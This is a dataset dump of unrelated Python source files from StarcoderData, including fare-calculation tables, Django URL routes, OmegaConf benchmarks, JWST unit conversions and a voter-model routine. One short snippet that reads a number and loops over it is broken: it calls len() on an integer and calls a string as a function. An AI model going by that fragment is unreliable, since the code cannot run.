id stringlengths 1 265 | text stringlengths 6 5.19M | dataset_id stringclasses 7
values |
|---|---|---|
3352086 | <reponame>kfields/robocute
import sys
from pyglet.window import key
from robocute.mailbox import Mailbox
class Keybox(Mailbox):
def __init__(self):
super().__init__()
def exit(self):
sys.exit()
def on_key_press(self, symbol, modifiers):
pass
class MultiKeybox(Mailbox):
def __init__(self):
super().__init__()
def on_key_press(self, symbol, modifiers):
for box in self.boxes:
box.on_key_press(symbol, modifiers)
| StarcoderdataPython |
3373316 | <reponame>waikato-datamining/wai-spectral-io
from enum import Enum
from typing import List
class InstrumentType(Enum):
SER_4250 = 0
SER_51A = 1
SIC_4250 = 2
SIC_6250 = 3
SIC_6250V = 4
PARALLEL_6250 = 5
PARALLEL_6250V = 6
BL_500 = 7
BL_400 = 8
SIC_6500 = 9
SIC_5500 = 10
SIC_5000 = 11
SIC_4500 = 12
INFRATEC = 13
code = property(lambda self: self.value)
@classmethod
def from_code(cls, code: int) -> 'InstrumentType':
"""
Gets an instrument type from its code.
:param code: The instrument type code.
:return: The instrument type.
"""
for instrument_type in cls:
if instrument_type.code == code:
return instrument_type
raise ValueError(f"No instrument type with code {code} found")
class InstrumentHeader:
"""
Instrument Header class.
"""
def __init__(self):
# 2 BYTES: Instrument type
self.instrument_type: InstrumentType = InstrumentType.SER_4250
# char[21] model number
self.model: str = ""
# char[9] serial number
self.serial: str = ""
# 2 BYTES integer, number of segments up to 20 (?)
self.num_seg: int = 0
# 40 BYTES int[20], points per sement.. ?
self.points_per_segment: List[int] = []
# 2 BYTES int spacing mode: 00=TILFIL, 01=EQUALSPC, 02=FILFIL, 03=SIN
self.spacing_mode: int = 0
# start float[7], inc float[7], end float[7] but looking at
self.wave: List[float] = []
# 2 BYTES int, number of EOC's (??) use 4400?
self.neoc: int = 0
# 94 bytes of padding
# 32 * 16 chars, null terminated constituent names
self.constituents: List[str] = []
@property
def starts(self) -> List[float]:
return self.wave[0:7]
@property
def increments(self) -> List[float]:
return self.wave[7:14]
@property
def ends(self) -> List[float]:
return self.wave[14:21]
| StarcoderdataPython |
43923 | <gh_stars>0
from django.urls import path
from rest_framework.authtoken.views import obtain_auth_token
from employee.views import EmployeeCreateView, EmployeeListView, EmployeeUpdateView, login_view, register_view, logout_view
app_name = 'employee'
urlpatterns = [
path('e/create', EmployeeCreateView.as_view(), name='test'),
path('e/list', EmployeeListView.as_view(), name='list'),
path('e/update/<int:pk>', EmployeeUpdateView.as_view(), name='list'),
path('e/api/token', obtain_auth_token, name='obtain-token'),
path('e/login', login_view, name='login'),
path('e/logout', logout_view, name='logout'),
path('e/register', register_view, name='register'),
] | StarcoderdataPython |
3308835 | <gh_stars>0
import pymongo
import os
from socialcar.settings import MONGO_DBNAME
TABLE_OF_ZONES = [[1,1,3,1,1,2,3,2,2,1],
[1,1,2,1,1,2,3,2,2,1],
[3,2,1,3,3,3,3,3,3,3],
[1,1,3,1,1,2,2,2,2,1],
[1,1,3,1,1,2,3,2,2,1],
[2,2,3,2,2,1,3,2,2,2],
[3,3,3,2,3,3,1,3,3,3],
[2,2,3,2,2,2,3,1,2,2],
[2,2,3,2,2,2,3,2,1,2],
[1,1,3,1,1,2,3,2,2,1]]
MONGO_HOST = os.environ.get('MONGO_HOST', 'localhost')
MONGO_PORT = int(os.environ.get('MONGO_PORT', 27017))
MONGO_USERNAME = os.environ.get('MONGO_USERNAME', '')
MONGO_PASSWORD = os.environ.get('MONGO_PASSWORD', '')
MONGO_ZONE_ID_COLLECTION = 'citybus_zone'
BUS_STOP_ID = 'lpp_id'
#===============================================================================
# rail_fare ()
#===============================================================================
def rail_fare(distance, name):
# convert meters to kilometers
distance = float(distance)/1000
# in case tariff per km is used as in .xlsx for Brussels
if name == 'Brussels':
if distance <= 8:
return 2.20
elif distance <= 9:
return 2.30
elif distance <= 10:
return 2.40
elif distance <= 11:
return 2.60
elif distance <= 12:
return 2.70
elif distance <= 13:
return 2.80
elif distance <= 14:
return 3.00
elif distance <= 15:
return 3.10
elif distance <= 16:
return 3.20
elif distance <= 17:
return 3.40
elif distance <= 18:
return 3.50
elif distance <= 19:
return 3.70
elif distance <= 20:
return 3.80
elif distance <= 21:
return 3.90
elif distance <= 22:
return 4.10
elif distance <= 23:
return 4.20
elif distance <= 24:
return 4.40
elif distance <= 25:
return 4.50
elif distance <= 26:
return 4.60
elif distance <= 27:
return 4.80
elif distance <= 28:
return 4.90
elif distance <= 29:
return 5.10
elif distance <= 30:
return 5.20
elif distance <= 33:
return 5.50
elif distance <= 36:
return 5.90
elif distance <= 39:
return 6.30
elif distance <= 42:
return 6.70
elif distance <= 45:
return 7.10
elif distance <= 48:
return 7.60
elif distance <= 51:
return 8.00
elif distance <= 54:
return 8.40
elif distance <= 57:
return 8.80
elif distance <= 60:
return 9.20
elif distance <= 65:
return 9.80
elif distance <= 70:
return 10.50
elif distance <= 75:
return 11.20
elif distance <= 80:
return 11.90
elif distance <= 85:
return 12.60
elif distance <= 90:
return 13.30
elif distance <= 95:
return 14.00
elif distance <= 100:
return 14.70
elif distance <= 105:
return 15.30
elif distance <= 110:
return 16.00
elif distance <= 115:
return 16.70
elif distance <= 120:
return 17.40
elif distance <= 125:
return 18.10
elif distance <= 130:
return 18.80
elif distance <= 135:
return 19.50
elif distance <= 140:
return 20.20
elif distance <= 145:
return 20.90
else:
return 21.90
# in case tariff per km is used instead of City - Rail Ljubljana (2.2 EUR fare) as in .xlsx for Ljubljana
elif name == 'Ljubljana':
if distance <= 10:
return 1.28
elif distance <= 20:
return 1.85
elif distance <= 30:
return 2.58
elif distance <= 40:
return 3.44
elif distance <= 50:
return 4.28
elif distance <= 60:
return 5.08
elif distance <= 70:
return 5.80
elif distance <= 80:
return 6.59
elif distance <= 90:
return 6.99
elif distance <= 100:
return 7.17
elif distance <= 120:
return 7.70
elif distance <= 140:
return 8.49
elif distance <= 160:
return 9.56
elif distance <= 180:
return 10.91
elif distance <= 200:
return 12.02
elif distance <= 220:
return 12.95
elif distance <= 240:
return 13.99
elif distance <= 260:
return 14.77
elif distance <= 280:
return 15.81
elif distance <= 300:
return 16.68
elif distance <= 320:
return 17.67
elif distance <= 340:
return 18.58
elif distance <= 360:
return 19.50
elif distance <= 380:
return 20.54
elif distance <= 400:
return 21.59
elif distance <= 420:
return 22.37
elif distance <= 440:
return 23.29
elif distance <= 460:
return 24.34
elif distance <= 480:
return 25.24
elif distance <= 500:
return 26.44
elif distance <= 525:
return 27.47
elif distance <= 550:
return 28.67
elif distance <= 575:
return 30.10
else:
return 31.29
else:
return -1
#===============================================================================
# bus_fare ()
#===============================================================================
def bus_fare(leg, name):
if name == 'Brussels':
# If provider is TEC
if leg['transport']['agency_id'] == 'TEC':
return 3.50
# If provider is De Lijn
else:
return 3.00
elif name == 'Ljubljana':
# from 'agency_id' find type of bus (citybus or intercity), e.g for citybus:'lpp_2197', intercity: '2206108040402'
if leg['transport']['agency_id'] == 'lpp':
return citybus_ljubljana(leg['route']['points'][0]['stop_id'], leg['route']['points'][-1]['stop_id'], leg['distance'])
else:
return bus_intercity_ljubljana(leg['distance'])
elif name == '<NAME>':
return 2.20 # ??how to calculate fare for 13 zones??
else:
return -1
#===============================================================================
# citybus_ljubljana ()
#===============================================================================
def citybus_ljubljana(start_id, end_id, distance):
# have a collection in db with stop_id, zone_id to find the zone each bus stop belongs to (e.g db collection citybus_zone)
client = pymongo.MongoClient(MONGO_HOST, MONGO_PORT)
db = client[MONGO_DBNAME]
collection = db[MONGO_ZONE_ID_COLLECTION] # name of collection in db for stop_id --> zone_id mapping
# find zone_id for first and last bus stops
start = collection.find_one({BUS_STOP_ID: start_id})
end = collection.find_one({BUS_STOP_ID: end_id})
# from TABLE_OF_ZONES find the number of zones crossed
if start['zone_id'] == 0 or end['zone_id'] == 0:
# if 'zone_id' == 0 use intercity bus fare
return bus_intercity_ljubljana(distance)
else:
number_of_zones = TABLE_OF_ZONES[start['zone_id']-1][end['zone_id']-1]
if number_of_zones == 1:
return 1.20
elif number_of_zones == 2:
return 1.60
else:
return 2.50
#===============================================================================
# bus_intercity_ljubljana ()
#===============================================================================
def bus_intercity_ljubljana(distance):
# convert meters to kilometers
distance = float(distance)/1000
if distance <= 5:
return 1.30
elif distance <= 10:
return 1.80
elif distance <= 15:
return 2.30
elif distance <= 20:
return 2.70
elif distance <= 25:
return 3.10
elif distance <= 30:
return 3.60
elif distance <= 35:
return 4.10
elif distance <= 40:
return 4.70
elif distance <= 45:
return 5.20
elif distance <= 50:
return 5.60
elif distance <= 55:
return 6.00
elif distance <= 60:
return 6.30
elif distance <= 65:
return 6.70
elif distance <= 70:
return 6.90
elif distance <= 75:
return 7.20
elif distance <= 80:
return 7.50
elif distance <= 85:
return 7.90
elif distance <= 90:
return 8.30
elif distance <= 95:
return 8.70
elif distance <= 100:
return 9.20
elif distance <= 105:
return 9.60
elif distance <= 110:
return 9.90
elif distance <= 115:
return 10.30
elif distance <= 120:
return 10.70
elif distance <= 125:
return 11.10
elif distance <= 130:
return 11.40
elif distance <= 135:
return 11.60
elif distance <= 140:
return 12.00
elif distance <= 145:
return 12.40
elif distance <= 150:
return 12.80
elif distance <= 160:
return 13.60
elif distance <= 170:
return 14.40
elif distance <= 180:
return 15.20
elif distance <= 190:
return 16.00
elif distance <= 200:
return 16.80
elif distance <= 210:
return 17.60
elif distance <= 220:
return 18.40
elif distance <= 230:
return 19.20
elif distance <= 240:
return 20.00
elif distance <= 250:
return 20.80
elif distance <= 260:
return 21.60
elif distance <= 270:
return 22.40
elif distance <= 280:
return 23.20
elif distance <= 290:
return 24.00
elif distance <= 300:
return 24.80
elif distance <= 310:
return 25.60
elif distance <= 320:
return 26.40
elif distance <= 330:
return 27.20
elif distance <= 340:
return 28.00
elif distance <= 350:
return 28.80
elif distance <= 360:
return 29.60
else:
return 30.40
#===============================================================================
# metro_fare ()
#===============================================================================
def metro_fare(name):
if name == 'Brussels':
return 2.10
else:
return -1
#===============================================================================
# tram_fare ()
#===============================================================================
def tram_fare(site, distance):
return -1
#===============================================================================
# carpooling_fare ()
#===============================================================================
def carpooling_fare(distance, name):
# convert meters to kilometers
distance = float(distance)/1000
if name == 'Edinburgh':
# convert kms to miles
distance = distance * 0.621
limit = 30
coefficient_one = 0.15
coefficient_two = 0.07
elif name == 'Brussels':
limit = 100
coefficient_one = 0.08
coefficient_two = 0.04
else:
return -1
if distance <= limit:
return coefficient_one * distance
else:
return (coefficient_one * limit) + (distance - limit) * coefficient_two
| StarcoderdataPython |
3307442 | import fasttext
from collections import Counter
from project.server.main.bso_category import get_bso_category
from project.server.main.pf_classifier import get_pf_label
from project.server.main.utils import download_file
import pickle
import os
os.system("mkdir -p /src/models/")
if os.path.exists("/src/models/all_categ_revue.pkl") is False:
download_file("https://storage.gra.cloud.ovh.net/v1/AUTH_32c5d10cb0fe4519b957064a111717e3/models/all_categ_revue.pkl", "/src/models/all_categ_revue.pkl")
all_categ_revue = pickle.load(open('/src/models/all_categ_revue.pkl', 'rb'))
def get_categ_from_source(source, top=1):
try:
mst_common = Counter(all_categ_revue[source]).most_common()
mst_common_list = [e[0] for e in mst_common if (e[0] and (e[0] not in ['unknown', '']))]
ans = ";".join([e for e in mst_common_list[0:top]]) # the most common
if ans == "":
ans = 'unknown'
except:
ans = 'unknown'
return ans
def get_discipline_calc(title, journal_name, details = False):
current_field = "unknown"
method = ""
pf_tags = []
top_categ = get_categ_from_source(journal_name, 3)
if isinstance(title, str) and len(title)>0:
prediction_pf = get_pf_label(title)
current_field = get_bso_category(prediction_pf)
method = "pf_classifier_confident"
pf_tags = prediction_pf
if current_field == "unknown":
current_field = get_categ_from_source(journal_name)
method = "category_from_journal"
if current_field == 'unknown' and isinstance(title, str) and len(title)>0:
prediction_pf_2 = get_pf_label(title, nb_top = 10)
current_field = get_bso_category(prediction_pf_2, is_strict=False)
method = "pf_classifier_lenient"
pf_tags = prediction_pf_2
ans = { "bso_classification": current_field }
if details:
ans.update( {
"bso_classification_method": method,
"bso_classification_pf_tags": pf_tags,
"bso_classification_journal_top_categ": top_categ
} )
return ans
def bso_classify(elems, details = False):
for e in elems:
if 'doi' in e and 'title' not in e or 'journal_name' not in e:
#e = enrich_metadata(e)
continue
if 'title' in e and 'journal_name' in e:
calc = get_discipline_calc(e['title'], e['journal_name'], details)
e.update(calc)
return elems
| StarcoderdataPython |
134797 |
from ..tre_elements import TREExtension, TREElement
__classification__ = "UNCLASSIFIED"
__author__ = "<NAME>"
class PT(TREElement):
def __init__(self, value):
super(PT, self).__init__()
self.add_field('LON', 's', 15, value)
self.add_field('LAT', 's', 15, value)
class ACVT(TREElement):
def __init__(self, value):
super(ACVT, self).__init__()
self.add_field('UNIAAV', 's', 3, value)
if self.UNIAAV != '':
self.add_field('AAV', 's', 5, value)
self.add_field('UNIAPV', 's', 3, value)
if self.UNIAPV != '':
self.add_field('APV', 's', 5, value)
self.add_field('NUMPTS', 'd', 3, value)
self.add_loop('PTs', self.NUMPTS, PT, value)
class ACCVTBType(TREElement):
def __init__(self, value):
super(ACCVTBType, self).__init__()
self.add_field('NUMACVT', 'd', 2, value)
self.add_loop('ACVTs', self.NUMACVT, ACVT, value)
class ACCVTB(TREExtension):
_tag_value = 'ACCVTB'
_data_type = ACCVTBType
| StarcoderdataPython |
1776337 | import copy
from typing import Any, Dict, List
from pytest import lazy_fixture # type: ignore
from pytest import fixture, mark, param
from omegaconf import OmegaConf
from omegaconf._utils import ValueKind, _is_missing_literal, get_value_kind
def build_dict(
d: Dict[str, Any], depth: int, width: int, leaf_value: Any = 1
) -> Dict[str, Any]:
if depth == 0:
for i in range(width):
d[f"key_{i}"] = leaf_value
else:
for i in range(width):
c: Dict[str, Any] = {}
d[f"key_{i}"] = c
build_dict(c, depth - 1, width, leaf_value)
return d
def build_list(length: int, val: Any = 1) -> List[int]:
return [val] * length
@fixture(scope="module")
def large_dict() -> Any:
return build_dict({}, 11, 2)
@fixture(scope="module")
def small_dict() -> Any:
return build_dict({}, 5, 2)
@fixture(scope="module")
def dict_with_list_leaf() -> Any:
return build_dict({}, 5, 2, leaf_value=[1, 2])
@fixture(scope="module")
def small_dict_config(small_dict: Any) -> Any:
return OmegaConf.create(small_dict)
@fixture(scope="module")
def dict_config_with_list_leaf(dict_with_list_leaf: Any) -> Any:
return OmegaConf.create(dict_with_list_leaf)
@fixture(scope="module")
def large_dict_config(large_dict: Any) -> Any:
return OmegaConf.create(large_dict)
@fixture(scope="module")
def merge_data(small_dict: Any) -> Any:
return [OmegaConf.create(small_dict) for _ in range(5)]
@fixture(scope="module")
def small_list() -> Any:
return build_list(3, 1)
@fixture(scope="module")
def small_listconfig(small_list: Any) -> Any:
return OmegaConf.create(small_list)
@mark.parametrize(
"data",
[
lazy_fixture("small_dict"),
lazy_fixture("large_dict"),
lazy_fixture("small_dict_config"),
lazy_fixture("large_dict_config"),
lazy_fixture("dict_config_with_list_leaf"),
],
)
def test_omegaconf_create(data: Any, benchmark: Any) -> None:
benchmark(OmegaConf.create, data)
@mark.parametrize(
"merge_function",
[
param(OmegaConf.merge, id="merge"),
param(OmegaConf.unsafe_merge, id="unsafe_merge"),
],
)
def test_omegaconf_merge(merge_function: Any, merge_data: Any, benchmark: Any) -> None:
benchmark(merge_function, merge_data)
@mark.parametrize(
"lst",
[
lazy_fixture("small_list"),
lazy_fixture("small_listconfig"),
],
)
def test_list_in(lst: List[Any], benchmark: Any) -> None:
benchmark(lambda seq, val: val in seq, lst, 10)
@mark.parametrize(
"lst",
[
lazy_fixture("small_list"),
lazy_fixture("small_listconfig"),
],
)
def test_list_iter(lst: List[Any], benchmark: Any) -> None:
def iterate(seq: Any) -> None:
for _ in seq:
pass
benchmark(iterate, lst)
@mark.parametrize(
"strict_interpolation_validation",
[True, False],
)
@mark.parametrize(
("value", "expected"),
[
("simple", ValueKind.VALUE),
("${a}", ValueKind.INTERPOLATION),
("${a:b,c,d}", ValueKind.INTERPOLATION),
("${${b}}", ValueKind.INTERPOLATION),
("${a:${b}}", ValueKind.INTERPOLATION),
("${long_string1xxx}_${long_string2xxx:${key}}", ValueKind.INTERPOLATION),
(
"${a[1].a[1].a[1].a[1].a[1].a[1].a[1].a[1].a[1].a[1].a[1]}",
ValueKind.INTERPOLATION,
),
],
)
def test_get_value_kind(
strict_interpolation_validation: bool, value: Any, expected: Any, benchmark: Any
) -> None:
assert benchmark(get_value_kind, value, strict_interpolation_validation) == expected
def test_is_missing_literal(benchmark: Any) -> None:
assert benchmark(_is_missing_literal, "???")
@mark.parametrize("force_add", [False, True])
@mark.parametrize("key", ["a", "a.<KEY>"])
def test_update_force_add(
large_dict_config: Any, key: str, force_add: bool, benchmark: Any
) -> None:
cfg = copy.deepcopy(large_dict_config) # this test modifies the config
if force_add:
OmegaConf.set_struct(cfg, True)
def recursive_is_struct(node: Any) -> None:
if OmegaConf.is_config(node):
OmegaConf.is_struct(node)
for val in node.values():
recursive_is_struct(val)
recursive_is_struct(cfg)
benchmark(OmegaConf.update, cfg, key, 10, force_add=force_add)
| StarcoderdataPython |
3367092 | <filename>src/robobase/converters.py
import math
import numpy as np
def rotate_matrix_to_axis_and_angle(r):
theta = math.acos((np.trace(r) - 1) / 2)
if round(theta, 5) == 0:
return theta, np.array([None, None, None]), None
if math.pi - 0.001 <= round(theta, 5) <= math.pi + 0.001:
wx = math.sqrt((r[0][0] + 1) / 2)
wy = math.sqrt((r[1][1] + 1) / 2) if wx == 0 else r[0][1] / (2 * wx)
if wx != 0:
wz = r[0][2] / (2 * wx)
elif wy != 0:
wz = r[1][2] / (2 * wy)
else:
wz = math.sqrt((r[2][2] + 1) / 2)
w = np.array([wx, wy, wz])
return theta, w, -1 * w
w = np.array([r[2][1] - r[1][2],
r[0][2] - r[2][0],
r[1][0] - r[0][1]])
w = w/(2 * math.sin(theta))
return theta, w, None
| StarcoderdataPython |
3378338 | <gh_stars>0
import time
from typing import Callable, Optional, Tuple
from .states import *
class Job:
"""
Generic job for the scheduler.
Jobs that can be scheduled in the scheduler-kernel to run at a particular time and a given number of times.
This is done calling schedule() and unschedule() and setting the parameters for process, args, interval,
and times.
"""
def __init__(
self,
process: Optional[Callable] = None,
args: Optional[Tuple] = (),
interval: float = 1.0,
times: Optional[int] = None,
job_name: Optional[str] = None,
run_main: bool = False,
conditional: Callable = None,
):
self.job_name = job_name
self.state = STATE_INITIALIZE
self.run_main = run_main
self.conditional = conditional
self.process = process
self.args = args
self.interval = interval
self.times = times
self._last_run = None
self._next_run = time.time() + self.interval
self._remaining = self.times
def __call__(self, *args, **kwargs):
self.process(*args, **kwargs)
def __str__(self):
if self.job_name is not None:
return self.job_name
else:
try:
return self.process.__name__
except AttributeError:
return object.__str__(self)
@property
def scheduled(self) -> bool:
return (
self._next_run is not None
and time.time() >= self._next_run
and (self.conditional is None or self.conditional())
)
def reset(self) -> None:
self._last_run = None
self._next_run = time.time() + self.interval
self._remaining = self.times
def cancel(self) -> None:
self._remaining = -1
class ConsoleFunction(Job):
"""
Special type of Job that runs the Console command provided when the job is executed.
"""
def __init__(
self,
context: "Context",
data: str,
interval: float = 1.0,
times: Optional[int] = None,
job_name: Optional[str] = None,
run_main: bool = False,
conditional: Callable = None,
):
Job.__init__(
self, self.__call__, None, interval, times, job_name, run_main, conditional
)
self.context = context
self.data = data
def __call__(self, *args, **kwargs):
self.context.console(self.data)
def __str__(self):
return self.data.replace("\n", "")
| StarcoderdataPython |
65404 | q=str(raw_input("give the number...\n"))
a=0
v=0
print("0")
while(a<len(a)):
b=int(a)
c=q(a)
v=v+c
a+=1
print v | StarcoderdataPython |
1610170 | """
test_correct_year
~~~~~~~~~~~~~~~~~
Test copyright year adjustment
:copyright: Copyright 2007-2021 by the Sphinx team, see AUTHORS.
:license: BSD, see LICENSE for details.
"""
import pytest
@pytest.fixture(
params=[
# test with SOURCE_DATE_EPOCH unset: no modification
(None, '2006-2009'),
# test with SOURCE_DATE_EPOCH set: copyright year should be updated
('1293840000', '2006-2011'),
('1293839999', '2006-2010'),
],
)
def expect_date(request, monkeypatch):
sde, expect = request.param
if sde:
monkeypatch.setenv('SOURCE_DATE_EPOCH', sde)
else:
monkeypatch.delenv('SOURCE_DATE_EPOCH', raising=False)
yield expect
@pytest.mark.sphinx('html', testroot='correct-year')
def test_correct_year(expect_date, app):
app.build()
content = (app.outdir / 'index.html').read_text()
assert expect_date in content
| StarcoderdataPython |
3375996 | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
def colorize(text, color):
colors = { "black" : 30,
"red" : 31,
"green" : 32,
"yellow" : 33,
"blue" : 34,
"purple" : 35,
"cyan" : 36,
"white" : 37,
"bold" : 1,
"underline" : 4,
"blink" : 5,
"inverse" : 6 }
return "\033[0;0;%dm%s\033[0m" % (colors[color], text)
def levenshtein(word1, word2, distance):
pass
| StarcoderdataPython |
1622823 | <reponame>ladsantos/Eureka
import numpy as np
import scipy.interpolate as spi
from scipy.constants import arcsec
from astropy.io import fits
def dn2electrons(data, meta):
"""
This function converts the data, uncertainty, and variance arrays from
raw units (DN) to electrons.
Parameters:
-----------
data: ndarray
data array of shape ([nx, ny, nimpos, npos]) in units of MJy/sr.
err: ndarray
uncertainties of data (same shape and units).
v0: ndarray
Read noise variance array
gainfile: str
Absolute file name of JWST gain reference file (R_GAIN)
mhdr: Record array
JWST master header
ywindow: Tuple
Start and end of subarray along Y axis
xwindow: Tuple
Start and end of subarray along X axis
Return:
-------
This procedure returns the input arrays in units of electrons.
Notes:
------
The gain files can be downloaded from CRDS (https://jwst-crds.stsci.edu/browse_db/)
Modification History:
---------------------
Written by <NAME> Jun 2021
"""
# Subarray parameters
xstart = data.mhdr['SUBSTRT1']
ystart = data.mhdr['SUBSTRT2']
nx = data.mhdr['SUBSIZE1']
ny = data.mhdr['SUBSIZE2']
# Load gain array in units of e-/ADU
gain = fits.getdata(meta.gainfile)[ystart:ystart+ny,xstart:xstart+nx]
# Gain subarray
subgain = gain[meta.ywindow[0]:meta.ywindow[1],meta.xwindow[0]:meta.xwindow[1]]
# Convert to electrons
data.subdata *= subgain
data.suberr *= subgain
data.subv0 *= (subgain)**2
return data
def bright2dn(data, meta):
"""
This function converts the data, uncertainty, and variance arrays from
brightness units (MJy/sr) to raw units (DN).
Parameters:
-----------
data: ndarray
data array of shape ([nx, ny, nimpos, npos]) in units of MJy/sr.
err: ndarray
uncertainties of data (same shape and units).
v0: ndarray
Read noise variance array
wave: ndarray
Pixel dependent wavelength values
photfile: str
Absolute file name of JWST photometric reference file (R_PHOTOM)
mhdr: Record array
JWST master header
shdr: Record array
JWST science header
Return:
-------
This procedure returns the input arrays in units of
data numbers (DN)).
Notes:
------
The photometry files can be downloaded from CRDS (https://jwst-crds.stsci.edu/browse_db/)
Modification History:
---------------------
2021-05-28 kbs Initial version
"""
# Load response function and wavelength
foo = fits.getdata(meta.photfile)
ind = np.where((foo['filter'] == data.mhdr['FILTER']) * (foo['pupil'] == data.mhdr['PUPIL']) * (foo['order'] == 1))[0][0]
response_wave = foo['wavelength'][ind]
response_vals = foo['relresponse'][ind]
igood = np.where(response_wave > 0)[0]
response_wave = response_wave[igood]
response_vals = response_vals[igood]
# Interpolate response at desired wavelengths
f = spi.interp1d(response_wave, response_vals, 'cubic')
response = f(data.subwave)
scalar = data.shdr['PHOTMJSR']
# Convert to DN/sec
data.subdata /= scalar * response
data.suberr /= scalar * response
data.subv0 /= (scalar * response)**2
# From DN/sec to DN
int_time = data.mhdr['EFFINTTM']
data.subdata *= int_time
data.suberr *= int_time
data.subv0 *= int_time
return data
def bright2flux(data, err, v0, pixel_area):
"""
This function converts the data and uncertainty arrays from
brightness units (MJy/sr) to flux units (Jy/pix).
Parameters:
-----------
data: ndarray
data array of shape ([nx, ny, nimpos, npos]) in units of MJy/sr.
uncd: ndarray
uncertainties of data (same shape and units).
pixel_area: ndarray
Pixel area (arcsec/pix)
Return:
-------
This procedure returns the input arrays Data and Uncd into
flux units (Jy/pix), if they are defined in the input.
Notes:
------
The input arrays Data and Uncd are changed in place.
Modification History:
---------------------
2005-06-20 statia Written by <NAME>, Cornell.
<EMAIL>
2005-10-13 jh Renamed, modified doc, removed posmed, fixed
nimpos default bug (was float rather than int).
2005-10-28 jh Updated header to give units being converted
from/to, made srperas value a calculation
rather than a constant, added Allen reference.
2005-11-24 jh Eliminated NIMPOS.
2008-06-28 jh Allow npos=1 case.
2010-01-29 patricio Converted to python. <EMAIL>
2010-11-01 patricio Documented, and incorporated scipy.constants.
2021-05-28 kbs Updated for JWST
"""
# steradians per square arcsecond
srperas = arcsec**2.0
data *= srperas * 1e6 * pixel_area
err *= srperas * 1e6 * pixel_area
v0 *= srperas * 1e6 * pixel_area
return data, err, v0
| StarcoderdataPython |
3294005 | # food100_split_for_yolo.py
#
# This script will split the food100 dataset into 2 files of images list
# accourding to the 'percentage_test'. The default is 10% will be assigned to test.
# (1) train.txt - the list of training images
# (2) test.txt - the list of validating images
#
# Credit: script is originated from blob post description
# <https://timebutt.github.io/static/how-to-train-yolov2-to-detect-custom-objects/>
#
import glob, os
# Current directory
current_dir = os.path.dirname(os.path.abspath(__file__))
# Directory where the data will reside, relative to 'darknet.exe'
path_data = '/data'
# Percentage of images to be used for the test set
percentage_test = 10;
# Create and/or truncate train.txt and test.txt
file_train = open('train.txt', 'w')
file_test = open('test.txt', 'w')
# Populate train.txt and test.txt
counter = 1
index_test = round(100 / percentage_test)
for pathAndFilename in glob.iglob(os.path.join(current_dir, "images/*/*.jpg")):
title, ext = os.path.splitext(os.path.basename(current_dir))
f = pathAndFilename.replace(current_dir, '')
if counter == index_test:
counter = 1
# file_test.write(path_data + title + '.jpg' + "\n")
file_test.write(path_data + f + "\n")
else:
# file_train.write(path_data + title + '.jpg' + "\n")
file_train.write(path_data + f + "\n")
counter = counter + 1
| StarcoderdataPython |
3372948 | <gh_stars>1-10
"""UniFi services."""
from homeassistant.core import callback
from .const import DOMAIN as UNIFI_DOMAIN
SERVICE_REMOVE_CLIENTS = "remove_clients"
@callback
def async_setup_services(hass) -> None:
"""Set up services for UniFi integration."""
async def async_call_unifi_service(service_call) -> None:
"""Call correct UniFi service."""
service = service_call.service
service_data = service_call.data
controllers = hass.data[UNIFI_DOMAIN].values()
if service == SERVICE_REMOVE_CLIENTS:
await async_remove_clients(controllers, service_data)
hass.services.async_register(
UNIFI_DOMAIN,
SERVICE_REMOVE_CLIENTS,
async_call_unifi_service,
)
@callback
def async_unload_services(hass) -> None:
"""Unload UniFi services."""
hass.services.async_remove(UNIFI_DOMAIN, SERVICE_REMOVE_CLIENTS)
async def async_remove_clients(controllers, data) -> None:
"""Remove select clients from controller.
Validates based on:
- Total time between first seen and last seen is less than 15 minutes.
- Neither IP, hostname nor name is configured.
"""
for controller in controllers:
if not controller.available:
continue
clients_to_remove = []
for client in controller.api.clients_all.values():
if client.last_seen - client.first_seen > 900:
continue
if any({client.fixed_ip, client.hostname, client.name}):
continue
clients_to_remove.append(client.mac)
if clients_to_remove:
await controller.api.clients.remove_clients(macs=clients_to_remove)
| StarcoderdataPython |
178900 | <filename>dvm/prob_votes.py
"""
This module implements the prob_votes subroutine for the Discrete Voter Model
for ecological inference.
"""
import functools
import tensorflow as tf
import tensorflow_probability as tfp
import elect
import tools
@functools.lru_cache(maxsize=None)
def get_vote_probability(flat_index, phc_shape, demo, partitions):
"""
Find the probability of a PHC's cell producing a
vote outcome of a given election for a candidate,
with a given PHC.
flat_index (int): the flat index of the selected cell
phc_shape (tuple): the shape of a PHC's Tensor representation
demo (tuple): the demographics of the district
partitions (tuple): the partitions of votes for a candidate
return: the probability that a PHC's cell produced the observed outcome
"""
# Find the corresponding index
index = tf.unravel_index(flat_index, phc_shape)
matrix_dim = phc_shape[0]
# Find the vote percentages for each demographic group
vote_pcts = elect.get_vote_pcts_list(index, matrix_dim)
# Binomial calculation
# Independent binomial distributions for each demographic group where each
# represents the probability of the voters in that group voting together
# to satisfy the possible partitions of voters
pmf = tfp.distributions.Binomial(demo, probs=vote_pcts).prob(partitions)
return tf.math.reduce_sum(tf.math.reduce_prod(pmf, 1))
def prob_votes(phc, demo, observed, rwm=False):
"""
Find the probability that a PHC produced
the observed number of votes that a candidate
received in a given election, with a given
PHC.
phc (Tensor): the Tensor representation of a PHC
demo (dict): the demographics of the district
observed (int): the observed number of votes the candidate received
rwm (bool): whether this function serves the RWM or HMC kernel
return: the probability that a PHC produced the observed outcomes
"""
partitions = tuple(tools.permute_integer_partition(observed, len(demo)))
if rwm:
flat_phc = tf.reshape(phc, [-1])
get_vote_prob_partial = functools.partial(
get_vote_probability,
phc_shape=tuple(phc.shape),
demo=tuple(demo.values()),
partitions=partitions)
else:
normalized_phc = tools.prob_normalize(phc)
flat_phc = tf.reshape(normalized_phc, [-1])
get_vote_prob_partial = functools.partial(
get_vote_probability,
phc_shape=tuple(normalized_phc.shape),
demo=tuple(demo.values()),
partitions=partitions)
# Calculate the probability for each cell
vote_prob = [get_vote_prob_partial(flat_index) for flat_index in range(tf.size(flat_phc))]
# TODO: Find a way to vectorize the above operation using Tensors
# vote_prob = tf.map_fn(get_vote_prob_partial,
# tf.range(tf.size(flat_phc)), dtype=tf.float32)
# tf.math.multiply(vote_prob, flat_phc): the vector of probabilities that
# each of the events happened (where an event is a cell producing the
# vote outcome).
# 1 - tf.math.multiply(vote_prob, flat_phc): the vector of probabilities
# that each of the events did not happen
# tf.math.reduce_prod(1 - tf.math.multiply(vote_prob, flat_phc)):
# the probability that none of the events happened
phc_prob_complement = tf.math.reduce_prod(
1 - tf.math.multiply(vote_prob, flat_phc))
# 1 - phc_prob_complement: the probability that at least one of the events
# happened
return tf.math.log(1 - phc_prob_complement)
| StarcoderdataPython |
